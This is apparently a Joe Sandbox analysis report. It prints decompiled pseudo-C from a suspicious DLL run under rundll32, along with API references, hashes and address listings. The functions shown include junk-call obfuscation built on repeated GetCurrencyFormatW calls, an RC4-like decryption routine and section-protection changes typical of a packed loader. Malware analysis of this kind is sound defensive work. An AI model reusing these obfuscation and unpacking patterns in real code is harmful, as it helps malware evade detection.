                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100039EE
                                                                                                              • Part of subcall function 10001E20: GetCurrencyFormatW.KERNEL32 ref: 10001E38
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A1A
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A3F
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A63
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003A88
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003AAA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003AD0
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003AFA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10003B1D
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: ($eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-2712681272
                                                                                                            • Opcode ID: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
                                                                                                            • Instruction ID: be84b0d19bb5b2932066f15e7eca2fa00d7c74bd76f66a19a1550838f82622ea
                                                                                                            • Opcode Fuzzy Hash: 6358d7462f08fcbe04848fd00b87f20519dc6db130516a4512fa2fb5f1ed022f
                                                                                                            • Instruction Fuzzy Hash: 06428BB1604215BFE314DB91CD82FA7BFACEB8B788F024409F705DB292D771E8548A65
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100018D8 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 194COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 87%
                                                                                                            			E100018D8(signed int _a4, signed int _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				intOrPtr* _v4;
				void* _v8;
				int _v12;
				void* _t78;
				signed int _t89;
				signed int _t111;
				signed int _t116;
				signed int _t117;
				signed int _t120;
				int _t129;
				short* _t159;

				_t129 = 0x22b9;
				_t159 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
				_v12 = 0;
				_a8 = _a4 - _a12 + _a8;
				_t78 = malloc(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440d0 + 0x4708); // executed
				_v8 = _t78;
				_a12 = 0;
				if(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708 > 0) {
					do {
						_t116 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t117 = _a12;
						 *(_t116 * _a8 *  *0x100440d0 + _t117 + _a16) = _t117;
						_a4 = _t117 % _a24;
						_t120 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
						_t129 = 0x22b9;
						 *((char*)(_v8 + _t120 * _a8 *  *0x100440d8 + _a12)) =  *((intOrPtr*)(_a4 + _a20));
						GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_a12 = _a12 + 1;
					} while (_a12 < GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", 0x22b9) * _a8 *  *0x100440e0 + 0x4708);
				}
				_a12 = _a12 & 0x00000000;
				do {
					_a4 =  *((char*)(_v8 + GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d4 + _a12));
					_t89 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					asm("cdq");
					_v12 = (( *(_t89 * _a8 *  *0x100440d8 + _a12 + _a16) & 0x000000ff) + _a4 + _v12) % 0x4708;
					_a4 =  *((intOrPtr*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _a12 + _a16));
					_v4 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440e0 + _v12 + _a16;
					 *((char*)(GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129) * _a8 *  *0x100440d0 + _a12 + _a16)) =  *_v4;
					_t111 = GetCurrencyFormatW(0, 0x11d4, _t159, 0, L"xadqsavcbdfewescGADW", _t129);
					_a12 = _a12 + 1;
					 *((char*)(_t111 * _a8 *  *0x100440dc + _v12 + _a16)) = _a4;
				} while (_a12 < 0x4708);
				return  *0x10046a64(_v8);
			}














                                                                                                            0x100018f1
                                                                                                            0x100018ff
                                                                                                            0x1000190e
                                                                                                            0x10001912
                                                                                                            0x1000192a
                                                                                                            0x10001937
                                                                                                            0x10001941
                                                                                                            0x1000195a
                                                                                                            0x10001960
                                                                                                            0x1000196c
                                                                                                            0x10001980
                                                                                                            0x10001986
                                                                                                            0x1000199d
                                                                                                            0x100019a1
                                                                                                            0x100019c2
                                                                                                            0x100019d3
                                                                                                            0x100019d6
                                                                                                            0x100019d8
                                                                                                            0x100019fb
                                                                                                            0x10001960
                                                                                                            0x10001a05
                                                                                                            0x10001a0a
                                                                                                            0x10001a3c
                                                                                                            0x10001a40
                                                                                                            0x10001a68
                                                                                                            0x10001a76
                                                                                                            0x10001a9f
                                                                                                            0x10001ac5
                                                                                                            0x10001af1
                                                                                                            0x10001af4
                                                                                                            0x10001b0a
                                                                                                            0x10001b1a
                                                                                                            0x10001b1a
                                                                                                            0x10001b35

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat$??3@malloc
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 203256951-3161301136
                                                                                                            • Opcode ID: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
                                                                                                            • Instruction ID: fba73ffc0b4bb754e4a8c3637f8b73e63a87aae8de5c3fee8d95280e19d6a203
                                                                                                            • Opcode Fuzzy Hash: a0604d6b19201fa23fe871278798098373fce57cb70cfb09eb1f26b7c660e828
                                                                                                            • Instruction Fuzzy Hash: 9F615A71508350AFE304DB11CD91F5BBFE9EBCA748F05590EF684AB2A1C731EA148E26
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000227A Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 172COMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 85%
                                                                                                            			E1000227A(void** __ebx, intOrPtr* _a4) {
				signed int _v8;
				signed int _t47;
				signed int _t48;
				signed int _t49;
				signed int _t60;
				signed int _t66;
				signed int _t68;
				int _t74;
				void** _t84;
				short* _t103;
				void* _t119;

				_t84 = __ebx;
				if(__ebx[2] != 0) {
					_t106 = 0x22b9;
					if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x02000000) == 0) {
						_t47 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb esi, esi");
						_t48 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb edi, edi");
						_t49 = GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9);
						asm("sbb eax, eax");
						_t103 = L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD";
						_v8 =  *((intOrPtr*)(0x10046a90 + ( ~( ~(_t49 *  *0x100440e0 - 0x80000000 & __ebx[3])) + ( ~( ~(_t48 *  *0x100440e0 + 0x40000000 & __ebx[3])) +  ~( ~(_t47 *  *0x100440d4 + 0x20000000 & __ebx[3])) * 2) * 2) * 4));
						if((__ebx[3] & GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + 0x04000000) != 0) {
							_v8 = _v8 | GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440d0 + 0x00000200;
						}
						_t60 = GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9);
						_t66 = VirtualProtect( *_t84, _t84[2] + GetCurrencyFormatW(0, 0x11d4, _t103, 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0, _v8, _t119 + 0x10 + _t60 *  *0x100440d8 * 4); // executed
						asm("sbb eax, eax");
						_t68 =  ~( ~_t66);
						L13:
						return _t68;
					}
					if( *__ebx != __ebx[1]) {
						L9:
						_t68 = 1;
						goto L13;
					}
					_t74 = 0;
					if(__ebx[4] != 0 ||  *((intOrPtr*)( *_a4 + 0x38)) ==  *(_a4 + 0x3c)) {
						L8:
						 *((intOrPtr*)(_a4 + 0x20))( *_t84, _t84[2], GetCurrencyFormatW(_t74, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", _t74, L"xadqsavcbdfewescGADW", _t106) *  *0x100440e0 + 0x4000,  *((intOrPtr*)(_a4 + 0x34)));
						goto L9;
					} else {
						if(GetCurrencyFormatW(0, 0x11d4, L"eofgerDSQWzbxberfjXFSqwaKLIOrtyZD", 0, L"xadqsavcbdfewescGADW", 0x22b9) *  *0x100440e0 + __ebx[2] %  *(_a4 + 0x3c) != 0) {
							goto L9;
						}
						_t106 = 0x22b9;
						_t74 = 0;
						goto L8;
					}
				}
				return 1;
			}














                                                                                                            0x1000227a
                                                                                                            0x10002281
                                                                                                            0x10002292
                                                                                                            0x100022bb
                                                                                                            0x10002358
                                                                                                            0x10002380
                                                                                                            0x10002386
                                                                                                            0x100023b2
                                                                                                            0x100023b8
                                                                                                            0x100023d5
                                                                                                            0x100023de
                                                                                                            0x100023f6
                                                                                                            0x1000240b
                                                                                                            0x1000242b
                                                                                                            0x1000242b
                                                                                                            0x1000243f
                                                                                                            0x10002470
                                                                                                            0x10002478
                                                                                                            0x1000247a
                                                                                                            0x1000247c
                                                                                                            0x00000000
                                                                                                            0x1000247e
                                                                                                            0x100022c6
                                                                                                            0x10002340
                                                                                                            0x10002342
                                                                                                            0x00000000
                                                                                                            0x10002342
                                                                                                            0x100022c8
                                                                                                            0x100022cd
                                                                                                            0x1000230d
                                                                                                            0x1000233a
                                                                                                            0x00000000
                                                                                                            0x100022dd
                                                                                                            0x10002304
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10002306
                                                                                                            0x1000230b
                                                                                                            0x00000000
                                                                                                            0x1000230b
                                                                                                            0x100022cd
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100022AA
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 100022EB
                                                                                                            • GetCurrencyFormatW.KERNEL32 ref: 10002322
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CurrencyFormat
                                                                                                            • String ID: eofgerDSQWzbxberfjXFSqwaKLIOrtyZD$xadqsavcbdfewescGADW
                                                                                                            • API String ID: 3383288267-3161301136
                                                                                                            • Opcode ID: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
                                                                                                            • Instruction ID: 001e048e4435a5d91bd341ad1d3e9c5f26db428d8a62d425f6a780c80bac8da3
                                                                                                            • Opcode Fuzzy Hash: 1879c51a0ca35df28eb5a6be710fe34797454b6d8926430bf9f23c6529057236
                                                                                                            • Instruction Fuzzy Hash: E651E1726002117FE301CB50CD86F97BBA9EB8B751F158418FB06EF191D730A864CBA4
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10010763 Relevance: 16.6, APIs: 11, Instructions: 103memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 80%
                                                                                                            			E10010763() {
				struct _CRITICAL_SECTION* _v4;
				char _v28;
				char _v36;
				char _v44;
				intOrPtr _v56;
				void* __ebx;
				intOrPtr __ecx;
				signed int __edi;
				void* __esi;
				void* __ebp;
				struct _CRITICAL_SECTION* _t39;
				intOrPtr _t40;
				void* _t41;
				long _t44;
				void* _t45;
				signed int* _t51;
				intOrPtr _t64;
				long _t68;
				void* _t69;
				void* _t70;
				signed int _t72;
				intOrPtr _t78;
				signed int _t82;
				void* _t86;
				signed int _t88;
				void* _t90;
				void* _t91;
				void* _t93;

				_push(_t72);
				_push(_t69);
				_push(_t88);
				_t86 = _t72;
				_t1 = _t86 + 0x1c; // 0x10048600
				_t39 = _t1;
				_v4 = _t39;
				EnterCriticalSection(_t39);
				_t3 = _t86 + 4; // 0x20
				_t40 =  *_t3;
				_t4 = _t86 + 8; // 0x3
				_t82 =  *_t4;
				if(_t82 >= _t40) {
					L7:
					_t82 = 1;
					__eflags = _t40 - 1;
					if(_t40 <= 1) {
						L12:
						_t21 = _t40 + 0x20; // 0x40
						_t88 = _t21;
						_t22 = _t86 + 0x10; // 0x932560
						_t41 =  *_t22;
						__eflags = _t41;
						if(__eflags != 0) {
							_t69 = GlobalHandle(_t41);
							GlobalUnlock(_t69);
							_t44 = E100010C9(_t72, __eflags, _t88, 8);
							_t72 = 0x2002;
							_t45 = GlobalReAlloc(_t69, _t44, ??);
						} else {
							_t68 = E100010C9(_t72, __eflags, _t88, 8);
							_pop(_t72);
							_t45 = GlobalAlloc(2, _t68); // executed
						}
						__eflags = _t45;
						if(_t45 != 0) {
							_t70 = GlobalLock(_t45);
							_t25 = _t86 + 4; // 0x20
							__eflags = _t88 -  *_t25 << 3;
							E10020F40(_t82, _t70 +  *_t25 * 8, 0, _t88 -  *_t25 << 3);
							 *(_t86 + 4) = _t88;
							 *(_t86 + 0x10) = _t70;
							goto L20;
						} else {
							_t23 = _t86 + 0x10; // 0x932560
							_t86 =  *_t23;
							__eflags = _t86;
							if(_t86 != 0) {
								GlobalLock(GlobalHandle(_t86));
							}
							LeaveCriticalSection(_v4);
							_push(_t88);
							_t90 = _t93;
							_push(_t72);
							_v28 = 0x100442e0;
							E100209E8( &_v28, 0x1003e1e4);
							asm("int3");
							_push(_t90);
							_t91 = _t93;
							_push(_t72);
							_v36 = 0x10044378;
							E100209E8( &_v36, 0x1003e298);
							asm("int3");
							_push(_t91);
							_push(_t72);
							_v44 = 0x10044410;
							E100209E8( &_v44, 0x1003e2dc);
							asm("int3");
							_push(4);
							E1001FBC4(E10032E9B, _t69, _t82, _t86);
							_t78 = E100105C8(0x104);
							_v56 = _t78;
							_t64 = 0;
							_v44 = 0;
							if(_t78 != 0) {
								_t64 = E1000E58E(_t78);
							}
							return E1001FC9C(_t64);
						}
					} else {
						_t18 = _t86 + 0x10; // 0x932560
						_t72 =  *_t18 + 8;
						__eflags = _t72;
						while(1) {
							__eflags =  *_t72 & 0x00000001;
							if(( *_t72 & 0x00000001) == 0) {
								break;
							}
							_t82 = _t82 + 1;
							_t72 = _t72 + 8;
							__eflags = _t82 - _t40;
							if(_t82 < _t40) {
								continue;
							}
							break;
						}
						__eflags = _t82 - _t40;
						if(_t82 < _t40) {
							goto L20;
						} else {
							goto L12;
						}
					}
				} else {
					_t13 = __esi + 0x10; // 0x932560
					__ecx =  *_t13;
					__eflags =  *(__ecx + __edi * 8) & 0x00000001;
					if(( *(__ecx + __edi * 8) & 0x00000001) == 0) {
						L20:
						_t30 = _t86 + 0xc; // 0x3
						__eflags = _t82 -  *_t30;
						if(_t82 >=  *_t30) {
							_t31 = _t82 + 1; // 0x4
							 *((intOrPtr*)(_t86 + 0xc)) = _t31;
						}
						_t33 = _t86 + 0x10; // 0x932560
						_t51 =  *_t33 + _t82 * 8;
						 *_t51 =  *_t51 | 0x00000001;
						__eflags =  *_t51;
						_t37 = _t82 + 1; // 0x4
						 *(_t86 + 8) = _t37;
						LeaveCriticalSection(_v4);
						return _t82;
					} else {
						goto L7;
					}
				}
			}































                                                                                                            0x10010763
                                                                                                            0x10010764
                                                                                                            0x10010765
                                                                                                            0x10010767
                                                                                                            0x10010769
                                                                                                            0x10010769
                                                                                                            0x1001076e
                                                                                                            0x10010772
                                                                                                            0x10010778
                                                                                                            0x10010778
                                                                                                            0x1001077b
                                                                                                            0x1001077b
                                                                                                            0x10010780
                                                                                                            0x1001078f
                                                                                                            0x10010791
                                                                                                            0x10010792
                                                                                                            0x10010794
                                                                                                            0x100107b1
                                                                                                            0x100107b1
                                                                                                            0x100107b1
                                                                                                            0x100107b4
                                                                                                            0x100107b4
                                                                                                            0x100107b7
                                                                                                            0x100107b9
                                                                                                            0x100107d7
                                                                                                            0x100107da
                                                                                                            0x100107e8
                                                                                                            0x100107ee
                                                                                                            0x100107f1
                                                                                                            0x100107bb
                                                                                                            0x100107be
                                                                                                            0x100107c4
                                                                                                            0x100107c8
                                                                                                            0x100107c8
                                                                                                            0x100107f7
                                                                                                            0x100107f9
                                                                                                            0x10010826
                                                                                                            0x10010828
                                                                                                            0x1001082f
                                                                                                            0x10010839
                                                                                                            0x10010841
                                                                                                            0x10010844
                                                                                                            0x00000000
                                                                                                            0x100107fb
                                                                                                            0x100107fb
                                                                                                            0x100107fb
                                                                                                            0x100107fe
                                                                                                            0x10010800
                                                                                                            0x1001080a
                                                                                                            0x1001080a
                                                                                                            0x10010814
                                                                                                            0x10004e3a
                                                                                                            0x10004e3b
                                                                                                            0x10004e3d
                                                                                                            0x10004e47
                                                                                                            0x10004e4e
                                                                                                            0x10004e53
                                                                                                            0x10004e54
                                                                                                            0x10004e55
                                                                                                            0x10004e57
                                                                                                            0x10004e61
                                                                                                            0x10004e68
                                                                                                            0x10004e6d
                                                                                                            0x10004e6e
                                                                                                            0x10004e71
                                                                                                            0x10004e7b
                                                                                                            0x10004e82
                                                                                                            0x10004e87
                                                                                                            0x10004e88
                                                                                                            0x10004e8f
                                                                                                            0x10004e9e
                                                                                                            0x10004ea0
                                                                                                            0x10004ea3
                                                                                                            0x10004ea7
                                                                                                            0x10004eaa
                                                                                                            0x10004eac
                                                                                                            0x10004eac
                                                                                                            0x10004eb6
                                                                                                            0x10004eb6
                                                                                                            0x10010796
                                                                                                            0x10010796
                                                                                                            0x10010799
                                                                                                            0x10010799
                                                                                                            0x1001079c
                                                                                                            0x1001079c
                                                                                                            0x1001079f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100107a1
                                                                                                            0x100107a2
                                                                                                            0x100107a5
                                                                                                            0x100107a7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100107a7
                                                                                                            0x100107a9
                                                                                                            0x100107ab
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x100107ab
                                                                                                            0x10010782
                                                                                                            0x10010782
                                                                                                            0x10010782
                                                                                                            0x10010785
                                                                                                            0x10010789
                                                                                                            0x10010847
                                                                                                            0x10010847
                                                                                                            0x10010847
                                                                                                            0x1001084a
                                                                                                            0x1001084c
                                                                                                            0x1001084f
                                                                                                            0x1001084f
                                                                                                            0x10010852
                                                                                                            0x10010859
                                                                                                            0x1001085c
                                                                                                            0x1001085c
                                                                                                            0x1001085f
                                                                                                            0x10010862
                                                                                                            0x10010865
                                                                                                            0x10010872
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10010789

                                                                                                            APIs
                                                                                                            • EnterCriticalSection.KERNEL32(10048600,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010772
                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107C8
                                                                                                            • GlobalHandle.KERNEL32(00932560), ref: 100107D1
                                                                                                            • GlobalUnlock.KERNEL32(00000000,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 100107DA
                                                                                                            • GlobalReAlloc.KERNEL32 ref: 100107F1
                                                                                                            • GlobalHandle.KERNEL32(00932560), ref: 10010803
                                                                                                            • GlobalLock.KERNEL32 ref: 1001080A
                                                                                                            • LeaveCriticalSection.KERNEL32(?,?,?,?,?,100485E4,10010A9E,00000004,1000EC18,10004E88,1000EC41,1000FF70,00000000,1000FFF6,00000001), ref: 10010814
                                                                                                            • GlobalLock.KERNEL32 ref: 10010820
                                                                                                            • _memset.LIBCMT ref: 10010839
                                                                                                            • LeaveCriticalSection.KERNEL32(?,00000058,10003840), ref: 10010865
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.466749400.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.466745909.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466779632.0000000010036000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466793022.0000000010044000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466810002.0000000010048000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466815058.000000001004B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466880718.0000000010071000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466914168.000000001007F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466927340.0000000010082000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.466980243.0000000010090000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                                                                                            • String ID:
                                                                                                            • API String ID: 496899490-0
                                                                                                            • Opcode ID: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
                                                                                                            • Instruction ID: cc07cb1ae1718158ec5411955b1f766252c932f609a865be9411df0e50f52d34
                                                                                                            • Opcode Fuzzy Hash: 996242b7fcfa61bad23c73a9a116ea6815c52f49dbe0cd54541e6c2615ba2795
                                                                                                            • Instruction Fuzzy Hash: 013180757047159FE325DF24CC88A2A77E9FF44241B01892DF9D6CB652DBB1F8848B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001F6F4 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 27%
                                                                                                            			E1001F6F4(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t10;
				intOrPtr _t13;
				intOrPtr _t23;
				void* _t25;

				_push(0xc);
				_push(0x10041288);
				_t8 = E10022714(__ebx, __edi, __esi);
				_t23 =  *((intOrPtr*)(_t25 + 8));
				if(_t23 == 0) {
					L9:
					return E10022759(_t8);
				}
				if( *0x1004a564 != 3) {
					_push(_t23);
					L7:
					_push(0);
					_t8 = RtlFreeHeap( *0x10048aa4); // executed
					_t31 = _t8;
					if(_t8 == 0) {
						_t10 = E10020B71(_t31);
						 *_t10 = E10020B36(GetLastError());
					}
					goto L9;
				}
				E10023FE8(4);
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t13 = E10024061(_t23);
				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
				if(_t13 != 0) {
					_push(_t23);
					_push(_t13);
					E1002408C();
				}
				 *(_t25 - 4) = 0xfffffffe;
				_t8 = E1001F74A();
				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
					goto L9;
				} else {
					_push( *((intOrPtr*)(_t25 + 8)));
					goto L7;
				}
			}







                                                                                                            0x1001f6f4
                                                                                                            0x1001f6f6
                                                                                                            0x1001f6fb
                                                                                                            0x1001f700
                                                                                                            0x1001f705
                                                                                                            0x1001f77c
                                                                                                            0x1001f781
                                                                                                            0x1001f781
                                                                                                            0x1001f70e
                                                                                                            0x1001f753
                                                                                                            0x1001f754
                                                                                                            0x1001f754
                                                                                                            0x1001f75c
                                                                                                            0x1001f762
                                                                                                            0x1001f764
                                                                                                            0x1001f766
                                                                                                            0x1001f779
                                                                                                            0x1001f77b
                                                                                                            0x00000000
                                                                                                            0x1001f764
                                                                                                            0x1001f712
                                                                                                            0x1001f718
                                                                                                            0x1001f71d
                                                                                                            0x1001f723
                                                                                                            0x1001f728
                                                                                                            0x1001f72a
                                                                                                            0x1001f72b
                                                                                                            0x1001f72c
                                                                                                            0x1001f732
                                                                                                            0x1001f733
                                                                                                            0x1001f73a
                                                                                                            0x1001f743
                                                                                                            0x00000000
                                                                                                            0x1001f745
                                                                                                            0x1001f745
                                                                                                            0x00000000
                                                                                                            0x1001f745

                                                                                                            APIs
                                                                                                            • __lock.LIBCMT ref: 1001F712
